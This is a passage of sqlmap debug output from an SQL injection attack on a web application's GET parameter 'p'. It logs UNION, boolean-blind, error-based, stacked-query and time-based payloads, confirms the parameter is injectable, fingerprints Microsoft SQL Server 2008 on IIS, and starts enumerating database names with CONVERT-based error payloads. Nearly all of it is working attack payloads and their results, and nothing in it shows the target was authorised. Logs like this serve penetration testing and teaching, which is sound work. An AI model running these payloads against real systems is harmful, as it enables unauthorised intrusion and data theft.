clauses' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'PostgreSQL error-based - GROUP BY and ORDER BY clauses' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'Oracle error-based - GROUP BY and ORDER BY clauses' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 stacked queries' because the payload for stacked queries has already been identified [09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 stacked queries (heavy query)' because the payload for stacked queries has already been identified [09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 stacked queries' because the payload for stacked queries has already been identified [09:55:33] [DEBUG] skipping test 'PostgreSQL stacked queries (heavy query)' because the payload for stacked queries has already been identified [09:55:33] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries (Glibc)' because the payload for stacked queries has already been identified [09:55:33] [DEBUG] skipping test 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)' because the payload for stacked queries has already been identified [09:55:33] [DEBUG] skipping test 'Oracle stacked queries (heavy query)' because the payload for stacked queries has already been identified [09:55:33] [DEBUG] skipping test 'Oracle stacked queries (DBMS_LOCK.SLEEP)' because the payload for stacked queries has already been identified [09:55:33] [DEBUG] skipping test 'Oracle stacked queries (USER_LOCK.SLEEP)' because the payload for stacked queries has already been identified [09:55:33] [DEBUG] skipping test 'SQLite > 2.0 stacked queries (heavy query)' because the payload for stacked queries has already been identified [09:55:33] [DEBUG] skipping test 'Firebird stacked queries (heavy query)' because the payload for stacked queries has already been identified [09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 AND time-based blind' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 AND time-based blind (comment)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 AND time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 AND time-based blind' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 AND time-based blind (comment)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'PostgreSQL AND time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'PostgreSQL AND time-based blind (heavy query - comment)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind (comment)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind (heavy query - comment)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'SQLite > 2.0 AND time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'SQLite > 2.0 AND time-based blind (heavy query - comment)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'Firebird AND time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'Firebird AND time-based blind (heavy query - comment)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 OR time-based blind' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 OR time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 OR time-based blind' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'PostgreSQL OR time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'Oracle OR time-based blind' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'Oracle OR time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'SQLite > 2.0 OR time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'Firebird OR time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 1 to 10 columns' because the back-end DBMS identified is Microsoft SQL Server [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 11 to 20 columns' because the level is higher than the provided [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 21 to 30 columns' because the level is higher than the provided [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 31 to 40 columns' because the level is higher than the provided [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 41 to 50 columns' because the level is higher than the provided [09:55:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [09:55:33] [PAYLOAD] 20111' UNION ALL SELECT NULL-- AND 'vrjZ'='vrjZ [09:55:34] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:34] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL-- AND 'GZNB'='GZNB [09:55:34] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:34] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL-- AND 'dLhE'='dLhE [09:55:35] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:35] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL-- AND 'XeTw'='XeTw [09:55:35] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:35] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND 'trjE'='trjE [09:55:36] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:36] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND 'rjRE'='rjRE [09:55:37] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:37] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'vmHq'='vmHq [09:55:37] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:37] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'ZBcW'='ZBcW [09:55:37] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:38] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'qhhM'='qhhM [09:55:38] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:38] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'OaNn'='OaNn [09:55:38] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:38] [INFO] target url appears to be UNION injectable with 3 columns [09:55:38] [PAYLOAD] 20111' UNION ALL SELECT NULL, CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(100)+CHAR(102)+CHAR(99)+CHAR(99) AS NVARCHAR(4000)), CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL-- AND 'VYhx'='VYhx [09:55:39] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:39] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(102)+CHAR(86)+CHAR(76)+CHAR(122) AS NVARCHAR(4000)), CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58)-- AND 'TyzA'='TyzA [09:55:39] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:39] [PAYLOAD] 20111' UNION ALL SELECT CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(116)+CHAR(101)+CHAR(83)+CHAR(98) AS NVARCHAR(4000)), CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL, NULL-- AND 'bKpM'='bKpM [09:55:40] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:40] [PAYLOAD] -8546' UNION ALL SELECT NULL, NULL, CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(76)+CHAR(119)+CHAR(88)+CHAR(66) AS NVARCHAR(4000)), CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58)-- AND 'HwBz'='HwBz [09:55:40] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:40] [PAYLOAD] -2422' UNION ALL SELECT CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(106)+CHAR(68)+CHAR(90)+CHAR(75) AS NVARCHAR(4000)), CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL, NULL-- AND 'hiSw'='hiSw [09:55:41] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:41] [PAYLOAD] -9676' UNION ALL SELECT NULL, CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(111)+CHAR(120)+CHAR(102)+CHAR(77) AS NVARCHAR(4000)), CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL-- AND 'FIBp'='FIBp [09:55:43] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 11 to 20 columns' because the level is higher than the provided [09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 21 to 30 columns' because the level is higher than the provided [09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 31 to 40 columns' because the level is higher than the provided [09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 41 to 50 columns' because the level is higher than the provided [09:55:43] [INFO] GET parameter 'p' is vulnerable. Do you want to keep testing the others? [y/N] N [09:55:43] [DEBUG] used the default behaviour, running in batch mode sqlmap identified the following injection points with a total of 30 HTTP(s) requests: --- Place: GET Parameter: p Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: p=20111' AND 4255=4255 AND 'obQa'='obQa Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: p=20111' AND 87=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (87=87) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'wAZl'='wAZl Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: p=20111'; WAITFOR DELAY '0:0:5';-- AND 'Hlos'='Hlos Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: p=20111' WAITFOR DELAY '0:0:5'-- AND 'YKua'='YKua --- [09:55:43] [INFO] testing Microsoft SQL Server [09:55:43] [PAYLOAD] 20111' AND 876=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (BINARY_CHECKSUM(76)=BINARY_CHECKSUM(76)) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'XHDB'='XHDB [09:55:44] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:44] [INFO] retrieved: 1 [09:55:44] [DEBUG] performed 1 queries in 0 seconds [09:55:44] [INFO] confirming Microsoft SQL Server [09:55:44] [PAYLOAD] 20111' AND 2557=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (HOST_NAME()=HOST_NAME()) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'eONH'='eONH [09:55:44] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:44] [INFO] retrieved: 1 [09:55:44] [DEBUG] performed 1 queries in 0 seconds [09:55:44] [PAYLOAD] 20111' AND 1181=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (XACT_STATE()=XACT_STATE()) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'erPM'='erPM [09:55:44] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:44] [INFO] retrieved: 1 [09:55:44] [DEBUG] performed 1 queries in 0 seconds [09:55:44] [PAYLOAD] 20111' AND 2691=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (SYSDATETIME()=SYSDATETIME()) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'ZLNT'='ZLNT [09:55:45] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:45] [INFO] retrieved: 1 [09:55:45] [DEBUG] performed 1 queries in 0 seconds [09:55:45] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows Vista web application technology: ASP.NET, Microsoft IIS 7.0 back-end DBMS: Microsoft SQL Server 2008 [09:55:45] [INFO] fetching database names [09:55:45] [PAYLOAD] 20111' AND 7776=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT ISNULL(CAST(COUNT(name) AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'IIWR'='IIWR [09:55:45] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:45] [INFO] the SQL query used returns 37 entries [09:55:45] [PAYLOAD] 20111' AND 6339=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 0 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'trwh'='trwh [09:55:46] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:46] [PAYLOAD] 20111' AND 5378=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 1 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'nEZn'='nEZn [09:55:46] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:46] [PAYLOAD] 20111' AND 3153=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 2 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'PAcn'='PAcn [09:55:47] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:47] [PAYLOAD] 20111' AND 2020=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 3 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'KnEl'='KnEl [09:55:47] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:47] [PAYLOAD] 20111' AND 8124=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 4 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'vwnC'='vwnC [09:55:48] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:48] [PAYLOAD] 20111' AND 5203=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 5 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'SomT'='SomT [09:55:48] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:48] [PAYLOAD] 20111' AND 2545=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 6 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'acLW'='acLW [09:55:48] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:48] [PAYLOAD] 20111' AND 6353=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 7 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'yXeO'='yXeO [09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:49] [PAYLOAD] 20111' AND 6404=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 8 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'meBT'='meBT [09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:49] [PAYLOAD] 20111' AND 5366=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 9 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'VLNB'='VLNB [09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:49] [PAYLOAD] 20111' AND 3216=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 10 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'GzkG'='GzkG [09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:49] [PAYLOAD] 20111' AND 9590=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 11 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'TbNN'='TbNN [09:55:50] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:50] [PAYLOAD] 20111' AND 8955=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 12 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'gFlv'='gFlv [09:55:50] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:50] [PAYLOAD] 20111' AND 5205=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 13 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'mJMn'='mJMn [09:55:50] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:50] [PAYLOAD] 20111' AND 7416=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 14 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'lNwo'='lNwo [09:55:51] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:51] [PAYLOAD] 20111' AND 2571=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 15 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'GvrD'='GvrD [09:55:52] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:52] [PAYLOAD] 20111' AND 3907=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 16 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'copc'='copc [09:55:53] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:53] [PAYLOAD] 20111' AND 2836=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 17 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'cbyQ'='cbyQ [09:55:53] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:53] [PAYLOAD] 20111' AND 2761=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 18 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'ajnb'='ajnb [09:55:53] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:53] [PAYLOAD] 20111' AND 4326=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 19 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'iIBt'='iIBt [09:55:54] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:54] [PAYLOAD] 20111' AND 6793=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 20 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'NIeI'='NIeI [09:55:54] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:54] [PAYLOAD] 20111' AND 4300=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 21 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'gTCQ'='gTCQ [09:55:54] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:54] [PAYLOAD] 20111' AND 9109=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 22 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'fkxe'='fkxe [09:55:55] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:55] [PAYLOAD] 20111' AND 4177=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 23 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'GsiT'='GsiT [09:55:55] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:55] [PAYLOAD] 20111' AND 4909=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 24 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'OSmP'='OSmP [09:55:55] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:55] [PAYLOAD] 20111' AND 5597=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 25 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'pmtB'='pmtB [09:55:56] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:56] [PAYLOAD] 20111' AND 445=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 26 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'COwJ'='COwJ [09:55:56] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:56] [PAYLOAD] 20111' AND 5653=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 27 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'kLbk'='kLbk [09:55:56] [DEBUG] got HTTP error code: 500 